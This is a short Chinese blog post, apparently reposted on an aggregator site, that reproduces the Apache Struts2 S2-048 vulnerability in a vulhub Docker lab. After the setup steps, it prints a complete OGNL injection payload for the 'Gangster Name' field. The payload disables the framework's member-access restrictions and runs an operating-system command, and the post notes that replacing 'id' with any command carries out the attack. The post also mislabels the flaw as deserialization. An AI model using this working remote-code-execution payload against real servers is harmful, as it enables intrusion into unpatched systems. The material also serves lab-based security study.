我是靠谱客的博主 哭泣电源,最近开发中收集的这篇文章主要介绍Struts2反序列化漏洞,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

介绍
Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互
漏洞环境
vulhub/struts2/s2-048
漏洞复现
1.ubuntu选择vulhub-master/struts2/s2-048目录,输入docker-compose up -d启动环境
在这里插入图片描述
2.访问http://192.168.16.131:8080/showcase/管理界面,ip为ubuntu的IP
在这里插入图片描述
3.选择ntegration/Struts 1 Integration,即为漏洞界面
在这里插入图片描述
4.Gangster Name输入以下代码即可执行( 之后替换id处为命令即可进行攻击)

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

执行效果
在这里插入图片描述

最后

以上就是哭泣电源为你收集整理的Struts2反序列化漏洞的全部内容,希望文章能够帮你解决Struts2反序列化漏洞所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(54)

评论列表共有 0 条评论

立即
投稿
返回
顶部